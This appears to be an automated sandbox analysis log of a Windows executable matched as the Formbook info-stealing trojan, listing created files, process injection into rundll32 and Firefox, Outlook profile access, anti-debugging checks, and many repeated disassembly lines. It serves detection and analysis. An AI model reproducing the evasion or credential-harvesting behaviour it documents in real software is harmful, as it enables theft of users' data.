        Source: 00000004.00000002.14743512323.00000000026C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/11@27/19
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 0_2_00403373 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403373
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 0_2_004046E6 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004046E6
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 0_2_004020FE LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,0_2_004020FE
        Source: C:\Users\user\Desktop\Antndte.exeFile created: C:\Users\Public\Pictures\Kenotism
        Source: C:\Users\user\Desktop\Antndte.exeFile created: C:\Users\user\AppData\Local\Temp\nsh111F.tmp
        Source: Antndte.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\Antndte.exeFile read: C:\Users\desktop.ini
        Source: C:\Users\user\Desktop\Antndte.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
        Source: Antndte.exeReversingLabs: Detection: 16%
        Source: C:\Users\user\Desktop\Antndte.exeFile read: C:\Users\user\Desktop\Antndte.exe
        Source: unknownProcess created: C:\Users\user\Desktop\Antndte.exe C:\Users\user\Desktop\Antndte.exe
        Source: C:\Users\user\Desktop\Antndte.exeProcess created: C:\Users\user\Desktop\Antndte.exe C:\Users\user\Desktop\Antndte.exe
        Source: C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
        Source: C:\Users\user\Desktop\Antndte.exeProcess created: C:\Users\user\Desktop\Antndte.exe C:\Users\user\Desktop\Antndte.exeJump to behavior
        Source: C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exeJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exeJump to behavior
        Source: C:\Users\user\Desktop\Antndte.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
        Source: Antndte.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: mshtml.pdb source: Antndte.exe, 00000002.00000001.9887364780.0000000000649000.00000020.00000001.01000000.00000007.sdmp
        Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: czazZqNSMxullu.exe, 00000004.00000002.14741699612.0000000000CAE000.00000002.00000001.01000000.0000000A.sdmp
        Source: Binary string: wntdll.pdbUGP source: Antndte.exe, 00000002.00000003.10003571766.000000003542C000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.10007207105.00000000355DA000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: Antndte.exe, Antndte.exe, 00000002.00000003.10003571766.000000003542C000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.10007207105.00000000355DA000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: rundll32.pdb source: Antndte.exe, 00000002.00000003.10053650494.0000000005419000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: rundll32.pdbGCTL source: Antndte.exe, 00000002.00000003.10053650494.0000000005419000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdbUGP source: Antndte.exe, 00000002.00000001.9887364780.0000000000649000.00000020.00000001.01000000.00000007.sdmp

        Data Obfuscation

        Source: Yara match File source: 00000000.00000002.9988850854.0000000007029000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000000.00000002.9987160663.0000000000740000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: Process Memory Space: Antndte.exe PID: 8040, type: MEMORYSTR
        Source: C:\Users\user\Desktop\Antndte.exe Code function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 0_2_10001B18
        Source: C:\Users\user\Desktop\Antndte.exe Code function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
        Source: C:\Users\user\Desktop\Antndte.exe File created: C:\Users\user\AppData\Local\Temp\nsm118D.tmp\LangDLL.dll
        Source: C:\Users\user\Desktop\Antndte.exe File created: C:\Users\user\AppData\Local\Temp\nsm118D.tmp\System.dll
        Source: C:\Users\user\Desktop\Antndte.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\Antndte.exe Code function: 2_2_357F1763 rdtsc 2_2_357F1763
        Source: C:\Windows\SysWOW64\rundll32.exe Window / User API: threadDelayed 9853
        Source: C:\Users\user\Desktop\Antndte.exe API coverage: 0.3 %
        Source: C:\Windows\SysWOW64\rundll32.exe TID: 2468 Thread sleep count: 120 > 30
        Source: C:\Windows\SysWOW64\rundll32.exe TID: 2468 Thread sleep time: -240000s >= -30000s
        Source: C:\Windows\SysWOW64\rundll32.exe TID: 2468 Thread sleep count: 9853 > 30
        Source: C:\Windows\SysWOW64\rundll32.exe TID: 2468 Thread sleep time: -19706000s >= -30000s
        Source: C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe TID: 2472 Thread sleep count: 41 > 30
        Source: C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe TID: 2472 Thread sleep time: -205000s >= -30000s
        Source: C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe TID: 2472 Thread sleep count: 87 > 30
        Source: C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe TID: 2472 Thread sleep time: -87000s >= -30000s
        Source: C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe TID: 2472 Thread sleep count: 75 > 30
        Source: C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe TID: 2472 Thread sleep time: -112500s >= -30000s
        Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
        Source: C:\Users\user\Desktop\Antndte.exe Code function: 0_2_00402862 FindFirstFileW, 0_2_00402862
        Source: C:\Users\user\Desktop\Antndte.exe Code function: 0_2_004065C5 FindFirstFileW,FindClose, 0_2_004065C5
        Source: C:\Users\user\Desktop\Antndte.exe Code function: 0_2_00405990 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405990
        Source: Antndte.exe, 00000002.00000002.10097194599.00000000053B6000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.10004311607.00000000053B6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
        Source: C:\Users\user\Desktop\Antndte.exe API call chain: ExitProcess graph end node graph_0-4629
        Source: C:\Users\user\Desktop\Antndte.exe API call chain: ExitProcess graph end node graph_0-4633
        Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort
        Source: C:\Users\user\Desktop\Antndte.exe Code function: 0_2_00401E43 LdrInitializeThunk,ShowWindow,EnableWindow, 0_2_00401E43
        Source: C:\Users\user\Desktop\Antndte.exe Code function: 2_2_3586F582 mov eax, dword ptr fs:[00000030h] 2_2_3586F582
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357D9723 mov eax, dword ptr fs:[00000030h]2_2_357D9723
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357B471B mov eax, dword ptr fs:[00000030h]2_2_357B471B
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357B471B mov eax, dword ptr fs:[00000030h]2_2_357B471B
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357D270D mov eax, dword ptr fs:[00000030h]2_2_357D270D
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357D270D mov eax, dword ptr fs:[00000030h]2_2_357D270D
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357D270D mov eax, dword ptr fs:[00000030h]2_2_357D270D
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357BD700 mov ecx, dword ptr fs:[00000030h]2_2_357BD700
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AB705 mov eax, dword ptr fs:[00000030h]2_2_357AB705
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AB705 mov eax, dword ptr fs:[00000030h]2_2_357AB705
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AB705 mov eax, dword ptr fs:[00000030h]2_2_357AB705
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AB705 mov eax, dword ptr fs:[00000030h]2_2_357AB705
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357B77F9 mov eax, dword ptr fs:[00000030h]2_2_357B77F9
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357B77F9 mov eax, dword ptr fs:[00000030h]2_2_357B77F9
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3587970B mov eax, dword ptr fs:[00000030h]2_2_3587970B
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3587970B mov eax, dword ptr fs:[00000030h]2_2_3587970B
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3586F717 mov eax, dword ptr fs:[00000030h]2_2_3586F717
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357DE7E0 mov eax, dword ptr fs:[00000030h]2_2_357DE7E0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357B37E4 mov eax, dword ptr fs:[00000030h]2_2_357B37E4
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357B37E4 mov eax, dword ptr fs:[00000030h]2_2_357B37E4
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357B37E4 mov eax, dword ptr fs:[00000030h]2_2_357B37E4
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357B37E4 mov eax, dword ptr fs:[00000030h]2_2_357B37E4
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357B37E4 mov eax, dword ptr fs:[00000030h]2_2_357B37E4
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357B37E4 mov eax, dword ptr fs:[00000030h]2_2_357B37E4
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357B37E4 mov eax, dword ptr fs:[00000030h]2_2_357B37E4
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3585E750 mov eax, dword ptr fs:[00000030h]2_2_3585E750
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357B07A7 mov eax, dword ptr fs:[00000030h]2_2_357B07A7
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357E1796 mov eax, dword ptr fs:[00000030h]2_2_357E1796
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357E1796 mov eax, dword ptr fs:[00000030h]2_2_357E1796
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3586F68C mov eax, dword ptr fs:[00000030h]2_2_3586F68C
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357B0670 mov eax, dword ptr fs:[00000030h]2_2_357B0670
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357F2670 mov eax, dword ptr fs:[00000030h]2_2_357F2670
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357F2670 mov eax, dword ptr fs:[00000030h]2_2_357F2670
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3583C691 mov eax, dword ptr fs:[00000030h]2_2_3583C691
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357E666D mov esi, dword ptr fs:[00000030h]2_2_357E666D
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357E666D mov eax, dword ptr fs:[00000030h]2_2_357E666D
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357E666D mov eax, dword ptr fs:[00000030h]2_2_357E666D
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357A7662 mov eax, dword ptr fs:[00000030h]2_2_357A7662
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357A7662 mov eax, dword ptr fs:[00000030h]2_2_357A7662
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357A7662 mov eax, dword ptr fs:[00000030h]2_2_357A7662
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357C3660 mov eax, dword ptr fs:[00000030h]2_2_357C3660
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357C3660 mov eax, dword ptr fs:[00000030h]2_2_357C3660
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357C3660 mov eax, dword ptr fs:[00000030h]2_2_357C3660
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357B965A mov eax, dword ptr fs:[00000030h]2_2_357B965A
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357B965A mov eax, dword ptr fs:[00000030h]2_2_357B965A
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357E265C mov eax, dword ptr fs:[00000030h]2_2_357E265C
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357E265C mov ecx, dword ptr fs:[00000030h]2_2_357E265C
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357E265C mov eax, dword ptr fs:[00000030h]2_2_357E265C
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357E5654 mov eax, dword ptr fs:[00000030h]2_2_357E5654
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_358786A8 mov eax, dword ptr fs:[00000030h]2_2_358786A8
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_358786A8 mov eax, dword ptr fs:[00000030h]2_2_358786A8
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AD64A mov eax, dword ptr fs:[00000030h]2_2_357AD64A
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AD64A mov eax, dword ptr fs:[00000030h]2_2_357AD64A
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357B3640 mov eax, dword ptr fs:[00000030h]2_2_357B3640
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357CF640 mov eax, dword ptr fs:[00000030h]2_2_357CF640
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357CF640 mov eax, dword ptr fs:[00000030h]2_2_357CF640
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357CF640 mov eax, dword ptr fs:[00000030h]2_2_357CF640
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357EC640 mov eax, dword ptr fs:[00000030h]2_2_357EC640
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357EC640 mov eax, dword ptr fs:[00000030h]2_2_357EC640
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3587A6C0 mov eax, dword ptr fs:[00000030h]2_2_3587A6C0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_358586C2 mov eax, dword ptr fs:[00000030h]2_2_358586C2
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357B0630 mov eax, dword ptr fs:[00000030h]2_2_357B0630
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357E0630 mov eax, dword ptr fs:[00000030h]2_2_357E0630
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357B7623 mov eax, dword ptr fs:[00000030h]2_2_357B7623
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357B5622 mov eax, dword ptr fs:[00000030h]2_2_357B5622
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357B5622 mov eax, dword ptr fs:[00000030h]2_2_357B5622
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357EC620 mov eax, dword ptr fs:[00000030h]2_2_357EC620
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3582C6F2 mov eax, dword ptr fs:[00000030h]2_2_3582C6F2
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3582C6F2 mov eax, dword ptr fs:[00000030h]2_2_3582C6F2
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357E360F mov eax, dword ptr fs:[00000030h]2_2_357E360F
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357DD600 mov eax, dword ptr fs:[00000030h]2_2_357DD600
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357DD600 mov eax, dword ptr fs:[00000030h]2_2_357DD600
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3586F607 mov eax, dword ptr fs:[00000030h]2_2_3586F607
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_35884600 mov eax, dword ptr fs:[00000030h]2_2_35884600
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_35843608 mov eax, dword ptr fs:[00000030h]2_2_35843608
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_35843608 mov eax, dword ptr fs:[00000030h]2_2_35843608
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_35843608 mov eax, dword ptr fs:[00000030h]2_2_35843608
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_35843608 mov eax, dword ptr fs:[00000030h]2_2_35843608
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_35843608 mov eax, dword ptr fs:[00000030h]2_2_35843608
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_35843608 mov eax, dword ptr fs:[00000030h]2_2_35843608
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357A96E0 mov eax, dword ptr fs:[00000030h]2_2_357A96E0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357A96E0 mov eax, dword ptr fs:[00000030h]2_2_357A96E0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357BC6E0 mov eax, dword ptr fs:[00000030h]2_2_357BC6E0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357B56E0 mov eax, dword ptr fs:[00000030h]2_2_357B56E0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357B56E0 mov eax, dword ptr fs:[00000030h]2_2_357B56E0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357B56E0 mov eax, dword ptr fs:[00000030h]2_2_357B56E0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357D66E0 mov eax, dword ptr fs:[00000030h]2_2_357D66E0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357D66E0 mov eax, dword ptr fs:[00000030h]2_2_357D66E0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3585D62C mov ecx, dword ptr fs:[00000030h]2_2_3585D62C
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3585D62C mov ecx, dword ptr fs:[00000030h]2_2_3585D62C
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3585D62C mov eax, dword ptr fs:[00000030h]2_2_3585D62C
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357DD6D0 mov eax, dword ptr fs:[00000030h]2_2_357DD6D0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_35838633 mov esi, dword ptr fs:[00000030h]2_2_35838633
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_35838633 mov eax, dword ptr fs:[00000030h]2_2_35838633
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_35838633 mov eax, dword ptr fs:[00000030h]2_2_35838633
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357B06CF mov eax, dword ptr fs:[00000030h]2_2_357B06CF
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357B8690 mov eax, dword ptr fs:[00000030h]2_2_357B8690
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357C0680 mov eax, dword ptr fs:[00000030h]2_2_357C0680
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357C0680 mov eax, dword ptr fs:[00000030h]2_2_357C0680
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357C0680 mov eax, dword ptr fs:[00000030h]2_2_357C0680
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357C0680 mov eax, dword ptr fs:[00000030h]2_2_357C0680
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357C0680 mov eax, dword ptr fs:[00000030h]2_2_357C0680
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357C0680 mov eax, dword ptr fs:[00000030h]2_2_357C0680
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357C0680 mov eax, dword ptr fs:[00000030h]2_2_357C0680
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357C0680 mov eax, dword ptr fs:[00000030h]2_2_357C0680
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357C0680 mov eax, dword ptr fs:[00000030h]2_2_357C0680
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357C0680 mov eax, dword ptr fs:[00000030h]2_2_357C0680
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357C0680 mov eax, dword ptr fs:[00000030h]2_2_357C0680
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357C0680 mov eax, dword ptr fs:[00000030h]2_2_357C0680
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357B6179 mov eax, dword ptr fs:[00000030h]2_2_357B6179
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357E716D mov eax, dword ptr fs:[00000030h]2_2_357E716D
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357E415F mov eax, dword ptr fs:[00000030h]2_2_357E415F
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AA147 mov eax, dword ptr fs:[00000030h]2_2_357AA147
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AA147 mov eax, dword ptr fs:[00000030h]2_2_357AA147
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AA147 mov eax, dword ptr fs:[00000030h]2_2_357AA147
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_358851B6 mov eax, dword ptr fs:[00000030h]2_2_358851B6
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357E7128 mov eax, dword ptr fs:[00000030h]2_2_357E7128
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357E7128 mov eax, dword ptr fs:[00000030h]2_2_357E7128
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357E0118 mov eax, dword ptr fs:[00000030h]2_2_357E0118
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AF113 mov eax, dword ptr fs:[00000030h]2_2_357AF113
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AF113 mov eax, dword ptr fs:[00000030h]2_2_357AF113
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AF113 mov eax, dword ptr fs:[00000030h]2_2_357AF113
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AF113 mov eax, dword ptr fs:[00000030h]2_2_357AF113
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AF113 mov eax, dword ptr fs:[00000030h]2_2_357AF113
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AF113 mov eax, dword ptr fs:[00000030h]2_2_357AF113
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AF113 mov eax, dword ptr fs:[00000030h]2_2_357AF113
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AF113 mov eax, dword ptr fs:[00000030h]2_2_357AF113
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AF113 mov eax, dword ptr fs:[00000030h]2_2_357AF113
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AF113 mov eax, dword ptr fs:[00000030h]2_2_357AF113
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AF113 mov eax, dword ptr fs:[00000030h]2_2_357AF113
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AF113 mov eax, dword ptr fs:[00000030h]2_2_357AF113
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AF113 mov eax, dword ptr fs:[00000030h]2_2_357AF113
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AF113 mov eax, dword ptr fs:[00000030h]2_2_357AF113
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AF113 mov eax, dword ptr fs:[00000030h]2_2_357AF113
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AF113 mov eax, dword ptr fs:[00000030h]2_2_357AF113
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AF113 mov eax, dword ptr fs:[00000030h]2_2_357AF113
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AF113 mov eax, dword ptr fs:[00000030h]2_2_357AF113
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AF113 mov eax, dword ptr fs:[00000030h]2_2_357AF113
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AF113 mov eax, dword ptr fs:[00000030h]2_2_357AF113
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AF113 mov eax, dword ptr fs:[00000030h]2_2_357AF113
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_358781EE mov eax, dword ptr fs:[00000030h]2_2_358781EE
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_358781EE mov eax, dword ptr fs:[00000030h]2_2_358781EE
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357D510F mov eax, dword ptr fs:[00000030h]2_2_357D510F
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357D510F mov eax, dword ptr fs:[00000030h]2_2_357D510F
